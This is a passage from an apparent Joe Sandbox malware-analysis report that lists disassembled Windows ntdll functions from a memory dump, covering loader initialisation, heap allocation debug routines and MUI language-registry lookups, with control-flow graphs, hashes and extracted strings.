                                                                          • Instruction ID: 97ca2f03658ad9921be1548eddbb1e9ad32cd4feded21586a6d0118b026a1861
                                                                          • Opcode Fuzzy Hash: 19a3d3982eb6d7a5057a652e025d6ab8b8bdbe8d4a15ed4f4cdd9c4033abce7b
                                                                          • Instruction Fuzzy Hash: 9190027161710402D50061594615746101547E0211FA1C956A0414928EC7B5895575E2
                                                                          Function 35722D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1 35722d10-35722d1c LdrInitializeThunk
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: de17877b9e5c1cd9d61cb23131fb9cc21cbb40e8c8f4ea4ea44af55e1a8e1247
                                                                          • Instruction ID: cb5b33f0f97a0f5e9bc87ab74e1e1aa9196cbec5707a9971e9a8c79761e24a41
                                                                          • Opcode Fuzzy Hash: de17877b9e5c1cd9d61cb23131fb9cc21cbb40e8c8f4ea4ea44af55e1a8e1247
                                                                          • Instruction Fuzzy Hash: BF90027121300413D51161594605747001947E0251FD1C957A0414918ED6768956B161
                                                                          Function 35722B90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 0 35722b90-35722b9c LdrInitializeThunk
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 21b00ed5866bd065554eb9f35aab7ac5ed03d7cc6bbcb9bc1eae59cd0327000b
                                                                          • Instruction ID: a1d135a176fd2ecccdd4f35000d98408ce3d6394dc4cc49169576577960a47b5
                                                                          • Opcode Fuzzy Hash: 21b00ed5866bd065554eb9f35aab7ac5ed03d7cc6bbcb9bc1eae59cd0327000b
                                                                          • Instruction Fuzzy Hash: 4C90027121308802D5106159850578A001547E0311F95C956A4414A18EC6B588957161

                                                                          Non-executed Functions

                                                                          Function 35789060 Relevance: 19.8, APIs: 8, Strings: 3, Instructions: 558timeCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 461 35789060-357890a9 462 357890f8-35789107 461->462 463 357890ab-357890b0 461->463 464 35789109-3578910e 462->464 465 357890b4-357890ba 462->465 463->465 466 35789893-357898a7 call 35724b50 464->466 467 357890c0-357890e4 call 35728f40 465->467 468 35789215-3578923d call 35728f40 465->468 475 35789113-357891b4 GetPEB call 3578d7e5 467->475 476 357890e6-357890f3 call 357a92ab 467->476 477 3578925c-35789292 468->477 478 3578923f-3578925a call 357898aa 468->478 488 357891d2-357891e7 475->488 489 357891b6-357891c4 475->489 487 357891fd-35789210 RtlDebugPrintTimes 476->487 482 35789294-35789296 477->482 478->482 482->466 486 3578929c-357892b1 RtlDebugPrintTimes 482->486 486->466 496 357892b7-357892be 486->496 487->466 488->487 491 357891e9-357891ee 488->491 489->488 490 357891c6-357891cb 489->490 490->488 494 357891f0 491->494 495 357891f3-357891f6 491->495 494->495 495->487 496->466 497 357892c4-357892df 496->497 498 357892e3-357892f4 call 3578a388 497->498 501 357892fa-357892fc 498->501 502 35789891 498->502 501->466 503 35789302-35789309 501->503 502->466 504 3578947c-35789482 503->504 505 3578930f-35789314 503->505 508 35789488-357894b7 call 35728f40 504->508 509 3578961c-35789622 504->509 506 3578933c 505->506 507 35789316-3578931c 505->507 513 35789340-35789391 call 35728f40 RtlDebugPrintTimes 506->513 507->506 512 3578931e-35789332 507->512 522 357894b9-357894c4 508->522 523 357894f0-35789505 508->523 510 35789674-35789679 509->510 511 35789624-3578962d 509->511 517 35789728-35789731 510->517 518 3578967f-35789687 510->518 511->498 516 35789633-3578966f call 35728f40 511->516 519 35789338-3578933a 512->519 520 35789334-35789336 512->520 513->466 555 35789397-3578939b 513->555 540 35789869 516->540 517->498 524 35789737-3578973a 517->524 526 35789689-3578968d 518->526 527 35789693-357896bd call 35788093 518->527 519->513 520->513 529 357894cf-357894ee 522->529 530 357894c6-357894cd 522->530 534 35789511-35789518 523->534 535 35789507-35789509 523->535 531 357897fd-35789834 call 35728f40 524->531 532 35789740-3578978a 524->532 526->517 526->527 552 35789888-3578988c 527->552 553 357896c3-3578971e call 35728f40 RtlDebugPrintTimes 527->553 539 35789559-35789576 RtlDebugPrintTimes 529->539 530->529 565 3578983b-35789842 531->565 566 35789836 531->566 537 3578978c 532->537 538 35789791-3578979e 532->538 543 3578953d-3578953f 534->543 541 3578950b-3578950d 535->541 542 3578950f 535->542 537->538 549 357897aa-357897ad 538->549 550 357897a0-357897a3 538->550 539->466 570 3578957c-3578959f call 35728f40 539->570 551 3578986d 540->551 541->534 542->534 547 3578951a-35789524 543->547 548 35789541-35789557 543->548 562 3578952d 547->562 563 35789526 547->563 548->539 560 357897b9-357897fb 549->560 561 357897af-357897b2 549->561 550->549 559 35789871-35789886 RtlDebugPrintTimes 551->559 552->498 553->466 594 35789724 553->594 556 357893eb-35789400 555->556 557 3578939d-357893a5 555->557 569 35789406-35789414 556->569 567 357893d2-357893e9 557->567 568 357893a7-357893d0 call 35788093 557->568 559->466 559->552 560->559 561->560 573 3578952f-35789531 562->573 563->548 571 35789528-3578952b 563->571 574 3578984d 565->574 575 35789844-3578984b 565->575 566->565 567->569 578 35789418-3578946f call 35728f40 RtlDebugPrintTimes 568->578 569->578 592 357895bd-357895d8 570->592 593 357895a1-357895bb 570->593 571->573 581 3578953b 573->581 582 35789533-35789535 573->582 576 35789851-35789857 574->576 575->576 583 35789859-3578985c 576->583 584 3578985e-35789864 576->584 578->466 597 35789475-35789477 578->597 581->543 582->581 589 35789537-35789539 582->589 583->540 584->551 590 35789866 584->590 589->543 590->540 595 357895dd-3578960b RtlDebugPrintTimes 592->595 593->595 594->517 595->466 599 35789611-35789617 595->599 597->552 599->524
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: $ $0
                                                                          • API String ID: 3446177414-3352262554
                                                                          • Opcode ID: ec41ab6155b4fe1b4d437f98f27f0142b95779321ef7e0a2ac153537358423b5
                                                                          • Instruction ID: f62544094da32339864f32081a376533f3d157fbc78f703ba9392061cb08d039
                                                                          • Opcode Fuzzy Hash: ec41ab6155b4fe1b4d437f98f27f0142b95779321ef7e0a2ac153537358423b5
                                                                          • Instruction Fuzzy Hash: E53203B1A083818FE350CF68C885B5BBBF5BF88344F04492EF5998B251D775E949CB52
                                                                          Function 35785490 Relevance: 18.5, Strings: 14, Instructions: 963COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • LanguageConfiguration, xrefs: 35785FA0
                                                                          • @, xrefs: 35785DF7
                                                                          • PreferredUILanguagesPending, xrefs: 35785D52
                                                                          • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlpSetPreferredUILanguages is not a valid multi-string!, xrefs: 35785604
                                                                          • PreferredUILanguages, xrefs: 35785F51
                                                                          • InstallLanguageFallback, xrefs: 35785BD0
                                                                          • @, xrefs: 35785D30
                                                                          • Control Panel\Desktop, xrefs: 35785CDE
                                                                          • @, xrefs: 35785BA7
                                                                          • @, xrefs: 35785FFA
                                                                          • @, xrefs: 35785F20
                                                                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 35785EDD
                                                                          • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 35785B61
                                                                          • LanguageConfigurationPending, xrefs: 35785DA1
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlpSetPreferredUILanguages is not a valid multi-string!$@$@$@$@$@$Control Panel\Desktop$InstallLanguageFallback$LanguageConfiguration$LanguageConfigurationPending$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                          • API String ID: 0-1325123933
                                                                          • Opcode ID: 7d4dfd1181b5d7f8bf8f436c61b771d9919df43d782683ac14993a4aa45e471e
                                                                          • Instruction ID: 17d53e956a7011a0f80c852af1e8ad1acf575a9c48ad8b273b739b31baa53afb
                                                                          • Opcode Fuzzy Hash: 7d4dfd1181b5d7f8bf8f436c61b771d9919df43d782683ac14993a4aa45e471e
                                                                          • Instruction Fuzzy Hash: 17725BB5608341AFD321CF25C845B6BB7EAFB88794F40492DF999DB250EB70D805CB92
                                                                          Function 3578FDF4 Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 348timeCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1029 3578fdf4-3578fe16 call 35737be4 1032 3578fe18-3578fe30 RtlDebugPrintTimes 1029->1032 1033 3578fe35-3578fe4d call 356d7662 1029->1033 1037 357902d1-357902e0 1032->1037 1038 3578fe53-3578fe69 1033->1038 1039 35790277 1033->1039 1041 3578fe6b-3578fe6e 1038->1041 1042 3578fe70-3578fe72 1038->1042 1040 3579027a-357902ce call 357902e6 1039->1040 1040->1037 1044 3578fe73-3578fe8a 1041->1044 1042->1044 1045 35790231-3579023a GetPEB 1044->1045 1046 3578fe90-3578fe93 1044->1046 1050 35790259-3579025e call 356db910 1045->1050 1051 3579023c-35790257 GetPEB call 356db910 1045->1051 1046->1045 1048 3578fe99-3578fea2 1046->1048 1052 3578febe-3578fed1 call 35790835 1048->1052 1053 3578fea4-3578febb call 356efed0 1048->1053 1059 35790263-35790274 call 356db910 1050->1059 1051->1059 1064 3578fedc-3578fef0 call 356d753f 1052->1064 1065 3578fed3-3578feda 1052->1065 1053->1052 1059->1039 1068 35790122-35790127 1064->1068 1069 3578fef6-3578ff02 GetPEB 1064->1069 1065->1064 1068->1040 1072 3579012d-35790139 GetPEB 1068->1072 1070 3578ff70-3578ff7b 1069->1070 1071 3578ff04-3578ff07 1069->1071 1075 35790068-3579007a call 356f2710 1070->1075 1076 3578ff81-3578ff88 1070->1076 1077 3578ff09-3578ff24 GetPEB call 356db910 1071->1077 1078 3578ff26-3578ff2b call 356db910 1071->1078 1073 3579013b-3579013e 1072->1073 1074 357901a7-357901b2 1072->1074 1079 3579015d-35790162 call 356db910 1073->1079 1080 35790140-3579015b GetPEB call 356db910 1073->1080 1074->1040 1084 357901b8-357901c3 1074->1084 1097 35790110-3579011d call 35790d24 call 35790835 1075->1097 1098 35790080-35790087 1075->1098 1076->1075 1083 3578ff8e-3578ff97 1076->1083 1088 3578ff30-3578ff51 call 356db910 GetPEB 1077->1088 1078->1088 1096 35790167-3579017b call 356db910 1079->1096 1080->1096 1091 3578ffb8-3578ffbc 1083->1091 1092 3578ff99-3578ffa9 1083->1092 1084->1040 1093 357901c9-357901d4 1084->1093 1088->1075 1118 3578ff57-3578ff6b 1088->1118 1101 3578ffce-3578ffd4 1091->1101 1102 3578ffbe-3578ffcc call 35713ae9 1091->1102 1092->1091 1099 3578ffab-3578ffb5 call 3579d646 1092->1099 1093->1040 1100 357901da-357901e3 GetPEB 1093->1100 1128 3579017e-35790188 GetPEB 1096->1128 1097->1068 1107 35790089-35790090 1098->1107 1108 35790092-3579009a 1098->1108 1099->1091 1111 35790202-35790207 call 356db910 1100->1111 1112 357901e5-35790200 GetPEB call 356db910 1100->1112 1104 3578ffd7-3578ffe0 1101->1104 1102->1104 1116 3578fff2-3578fff5 1104->1116 1117 3578ffe2-3578fff0 1104->1117 1107->1108 1120 357900b8-357900bc 1108->1120 1121 3579009c-357900ac 1108->1121 1125 3579020c-3579022c call 3578823a call 356db910 1111->1125 1112->1125 1126 35790065 1116->1126 1127 3578fff7-3578fffe 1116->1127 1117->1116 1118->1075 1131 357900ec-357900f2 1120->1131 1132 357900be-357900d1 call 35713ae9 1120->1132 1121->1120 1129 357900ae-357900b3 call 3579d646 1121->1129 1125->1128 1126->1075 1127->1126 1135 35790000-3579000b 1127->1135 1128->1040 1137 3579018e-357901a2 1128->1137 1129->1120 1136 357900f5-357900fc 1131->1136 1143 357900e3 1132->1143 1144 357900d3-357900e1 call 3570fdb9 1132->1144 1135->1126 1141 3579000d-35790016 GetPEB 1135->1141 1136->1097 1142 357900fe-3579010e 1136->1142 1137->1040 1146 35790018-35790033 GetPEB call 356db910 1141->1146 1147 35790035-3579003a call 356db910 1141->1147 1142->1097 1149 357900e6-357900ea 1143->1149 1144->1149 1155 3579003f-3579005d call 3578823a call 356db910 1146->1155 1147->1155 1149->1136 1155->1126
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                          • API String ID: 3446177414-1700792311
                                                                          • Opcode ID: d4d73ee9b5703aa9229dceac47f8fd35b375f5e33e049f7afe91fc6bc87b40ab
                                                                          • Instruction ID: c621e516cbd741c4e07e945a692ca848b16b59ea3b5f9bff0547afa0fd590a18
                                                                          • Opcode Fuzzy Hash: d4d73ee9b5703aa9229dceac47f8fd35b375f5e33e049f7afe91fc6bc87b40ab
                                                                          • Instruction Fuzzy Hash: 3BD1FF39A24685DFCB15CFA8D404AE9FBF2FF4A360F048459E445AF221DB71A942CB24
                                                                          Function 356DD2EC Relevance: 12.8, Strings: 10, Instructions: 312COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1271 356dd2ec-356dd32d 1272 356dd333-356dd335 1271->1272 1273 3573a69c 1271->1273 1272->1273 1274 356dd33b-356dd33e 1272->1274 1276 3573a6a6-3573a6bf call 3579bd08 1273->1276 1274->1273 1275 356dd344-356dd34c 1274->1275 1277 356dd34e-356dd350 1275->1277 1278 356dd356-356dd3a1 call 35725050 call 35722ab0 1275->1278 1284 3573a6c5-3573a6c8 1276->1284 1285 356dd56a-356dd56d 1276->1285 1277->1278 1280 3573a5f6-3573a5fb 1277->1280 1296 3573a600-3573a61a call 356d7220 1278->1296 1297 356dd3a7-356dd3b0 1278->1297 1283 356dd5c0-356dd5c8 1280->1283 1288 356dd54d-356dd54f 1284->1288 1287 356dd56f-356dd575 1285->1287 1291 356dd63b-356dd63d 1287->1291 1292 356dd57b-356dd588 GetPEB call 356f3bc0 1287->1292 1288->1285 1290 356dd551-356dd564 call 35703262 1288->1290 1290->1285 1310 3573a6cd-3573a6d2 1290->1310 1298 356dd58d-356dd592 1291->1298 1292->1298 1314 3573a624-3573a628 1296->1314 1315 3573a61c-3573a61e 1296->1315 1303 356dd3ba-356dd3cd call 356dd736 1297->1303 1304 356dd3b2-356dd3b4 1297->1304 1301 356dd594-356dd59d call 35722a80 1298->1301 1302 356dd5a1-356dd5a6 1298->1302 1301->1302 1306 356dd5a8-356dd5b1 call 35722a80 1302->1306 1307 356dd5b5-356dd5ba 1302->1307 1320 3573a658 1303->1320 1321 356dd3d3-356dd3d7 1303->1321 1304->1303 1305 3573a630-3573a63b call 3579ad61 1304->1305 1305->1303 1328 3573a641-3573a653 1305->1328 1306->1307 1307->1283 1316 3573a6d7-3573a6db call 35722a80 1307->1316 1310->1285 1314->1305 1315->1314 1322 356dd52e 1315->1322 1329 3573a6e0 1316->1329 1334 3573a660-3573a662 1320->1334 1326 356dd3dd-356dd3f7 call 356dd8d0 1321->1326 1327 356dd5cb-356dd623 call 35725050 call 35722ab0 1321->1327 1325 356dd530-356dd535 1322->1325 1330 356dd549 1325->1330 1331 356dd537-356dd539 1325->1331 1326->1334 1339 356dd3fd-356dd44e call 35725050 call 35722ab0 1326->1339 1345 356dd625 1327->1345 1346 356dd642-356dd645 1327->1346 1328->1303 1329->1329 1330->1288 1331->1276 1335 356dd53f-356dd543 1331->1335 1334->1285 1338 3573a668 1334->1338 1335->1276 1335->1330 1341 3573a66d 1338->1341 1339->1320 1351 356dd454-356dd45d 1339->1351 1347 3573a677-3573a67c 1341->1347 1350 356dd62f-356dd636 1345->1350 1346->1322 1347->1291 1350->1325 1351->1341 1352 356dd463-356dd492 call 35725050 call 356dd64a 1351->1352 1352->1350 1357 356dd498-356dd49e 1352->1357 1357->1350 1358 356dd4a4-356dd4aa 1357->1358 1358->1291 1359 356dd4b0-356dd4cc GetPEB call 356f5d90 1358->1359 1359->1347 1362 356dd4d2-356dd4ef call 356dd64a 1359->1362 1365 356dd526-356dd52c 1362->1365 1366 356dd4f1-356dd4f6 1362->1366 1365->1287 1365->1322 1367 356dd4fc-356dd524 call 35704ca6 1366->1367 1368 3573a681-3573a686 1366->1368 1367->1365 1368->1367 1369 3573a68c-3573a697 1368->1369 1369->1325
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$h.p5
                                                                          • API String ID: 0-657615941
                                                                          • Opcode ID: 4a02a0592f44186696efa064075a7d70176f0b77935c5732206f7f70aeb289ec
                                                                          • Instruction ID: f20f3f5ed8057a8970cd2070ac6854b4b89d15954ea9ce9753ae15ca9e425395
                                                                          • Opcode Fuzzy Hash: 4a02a0592f44186696efa064075a7d70176f0b77935c5732206f7f70aeb289ec
                                                                          • Instruction Fuzzy Hash: 84B19BB2909341DFD721DF24C441A5FBBF9BB88794F42492EF8899B241DB70D948CB92
                                                                          Function 3578F0A5 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 231timeCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1483 3578f0a5-3578f0c7 call 35737be4 1486 3578f0c9-3578f0de RtlDebugPrintTimes 1483->1486 1487 3578f0e3-3578f0fb call 356d7662 1483->1487 1491 3578f3e7-3578f3f6 1486->1491 1492 3578f101-3578f11c 1487->1492 1493 3578f3d2 1487->1493 1495 3578f11e 1492->1495 1496 3578f125-3578f137 1492->1496 1494 3578f3d5-3578f3e4 call 3578f3f9 1493->1494 1494->1491 1495->1496 1497 3578f139-3578f13b 1496->1497 1498 3578f13c-3578f144 1496->1498 1497->1498 1500 3578f14a-3578f14d 1498->1500 1501 3578f350-3578f359 GetPEB 1498->1501 1500->1501 1503 3578f153-3578f156 1500->1503 1504 3578f378-3578f37d call 356db910 1501->1504 1505 3578f35b-3578f376 GetPEB call 356db910 1501->1505 1508 3578f158-3578f170 call 356efed0 1503->1508 1509 3578f173-3578f196 call 35790835 call 356f5d90 call 35790d24 1503->1509 1511 3578f382-3578f396 call 356db910 1504->1511 1505->1511 1508->1509 1509->1494 1522 3578f19c-3578f1a3 1509->1522 1511->1493 1523 3578f1ae-3578f1b6 1522->1523 1524 3578f1a5-3578f1ac 1522->1524 1525 3578f1b8-3578f1c8 1523->1525 1526 3578f1d4-3578f1d8 1523->1526 1524->1523 1525->1526 1527 3578f1ca-3578f1cf call 3579d646 1525->1527 1528 3578f208-3578f20e 1526->1528 1529 3578f1da-3578f1ed call 35713ae9 1526->1529 1527->1526 1532 3578f211-3578f21b 1528->1532 1538 3578f1ff 1529->1538 1539 3578f1ef-3578f1fd call 3570fdb9 1529->1539 1534 3578f21d-3578f22d 1532->1534 1535 3578f22f-3578f236 1532->1535 1534->1535 1536 3578f238-3578f23c call 35790835 1535->1536 1537 3578f241-3578f250 GetPEB 1535->1537 1536->1537 1541 3578f2be-3578f2c9 1537->1541 1542 3578f252-3578f255 1537->1542 1544 3578f202-3578f206 1538->1544 1539->1544 1541->1494 1545 3578f2cf-3578f2d5 1541->1545 1546 3578f274-3578f279 call 356db910 1542->1546 1547 3578f257-3578f272 GetPEB call 356db910 1542->1547 1544->1532 1545->1494 1549 3578f2db-3578f2e2 1545->1549 1554 3578f27e-3578f292 call 356db910 1546->1554 1547->1554 1549->1494 1552 3578f2e8-3578f2f3 1549->1552 1552->1494 1555 3578f2f9-3578f302 GetPEB 1552->1555 1562 3578f295-3578f29f GetPEB 1554->1562 1557 3578f321-3578f326 call 356db910 1555->1557 1558 3578f304-3578f31f GetPEB call 356db910 1555->1558 1564 3578f32b-3578f34b call 3578823a call 356db910 1557->1564 1558->1564 1562->1494 1565 3578f2a5-3578f2b9 1562->1565 1564->1562 1565->1494
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                          • API String ID: 3446177414-1745908468
                                                                          • Opcode ID: 0000288d464c31567b8ea0075f3edcfc82e4742b389ae4674e487ec4c92d8f60
                                                                          • Instruction ID: d86fc6f4cc456d4f5eb87d294030e7514201211f3ed20ea05ef1c21fcec96500
                                                                          • Opcode Fuzzy Hash: 0000288d464c31567b8ea0075f3edcfc82e4742b389ae4674e487ec4c92d8f60
                                                                          • Instruction Fuzzy Hash: FE911C39A05684DFDB01CFA8C846A9DFBF2FF49360F04845AE441AF651CB76A942CF14
                                                                          Function 356DD02D Relevance: 11.5, Strings: 9, Instructions: 249COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • @, xrefs: 356DD09D
                                                                          • @, xrefs: 356DD24F
                                                                          • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 356DD06F
                                                                          • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 356DD0E6
                                                                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 356DD263
                                                                          • @, xrefs: 356DD2B3
                                                                          • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 356DD202
                                                                          • h.p5, xrefs: 3573A5D2
                                                                          • Control Panel\Desktop\LanguageConfiguration, xrefs: 356DD136
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration$h.p5
                                                                          • API String ID: 0-4002567227
                                                                          • Opcode ID: 575f8af787017957b6d3f94906d46539a855fb1cb2ad7be62b447a2725c5e5d9
                                                                          • Instruction ID: 5b1b9f7f5a09208ce7069f6b5157de482c658ce4dfc36de3e66c3cd90aae8522
                                                                          • Opcode Fuzzy Hash: 575f8af787017957b6d3f94906d46539a855fb1cb2ad7be62b447a2725c5e5d9
                                                                          • Instruction Fuzzy Hash: 00A138B1908305DFE721DF21C885B9BB7F8BB84765F01492EE9989A241DB74D908CB93
                                                                          Function 3570D6D0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 151timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RtlDebugPrintTimes.NTDLL ref: 3570D879
                                                                            • Part of subcall function 356E4779: RtlDebugPrintTimes.NTDLL ref: 356E4817
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: DebugPrintTimes
                                                                          • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                          • API String ID: 3446177414-1975516107
                                                                          • Opcode ID: 20826f66e9c27ead3051e6c4e4e5ec5eb743d76584ea3c6f7f6b536dcfb24aed
                                                                          • Instruction ID: 1182a1a6019ac64be9d1c7a6e6f91980643b619b385e6ecd8f79c4a1c940b6be
                                                                          • Opcode Fuzzy Hash: 20826f66e9c27ead3051e6c4e4e5ec5eb743d76584ea3c6f7f6b536dcfb24aed
                                                                          • Instruction Fuzzy Hash: 0251AC75E043459FDB14CFA4C9847AEBBF2BF44324F624059D801AB281DBB1A986CFD0
                                                                          Function 3578F51B Relevance: 10.2, Strings: 8, Instructions: 189COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2985481380.00000000356B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 356B0000, based on PE: true
                                                                          • Associated: 00000003.00000002.2985481380.00000000357D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          • Associated: 00000003.00000002.2985481380.00000000357DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_356b0000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID:
